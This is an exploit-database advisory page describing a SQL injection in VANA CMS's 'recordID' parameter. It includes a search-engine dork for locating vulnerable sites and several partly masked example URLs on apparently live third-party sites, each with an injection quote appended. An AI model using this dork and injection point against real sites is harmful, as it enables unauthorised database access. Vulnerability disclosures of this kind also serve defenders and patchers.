VANA CMS SQL Injection

2012.06.19
Credit: Black Hat Group
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: inurl:\"general/index.php?recordID=\"

########################### # Exploit Title : VANA CMS SQL Injection # Author : Black Hat Group # Dork : inurl:"general/index.php?recordID=" # Discovered By : D3v!lzc0der # Home : http://greyh4t.com - http://black-hg.org # Software Link : http://www.vanasoft.com/ # Security Risk : High # Version : All Version ########################### # p0c : /general/index.php?recordID=[SQL] # # Example : # http://exxls.com/general/index.php?recordID=125' # http://denaxxanat.net/general/index.php?recordID=125' # http://erxxls.com/general/index.php?recordID=12' ########################### # Special Thanks To : Net.Edit0r - 3H34N - A.Cr0x - G3n3rall - Mr.XHat - Nol1m1t ###########################

References:

http://www.vanasoft.com/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top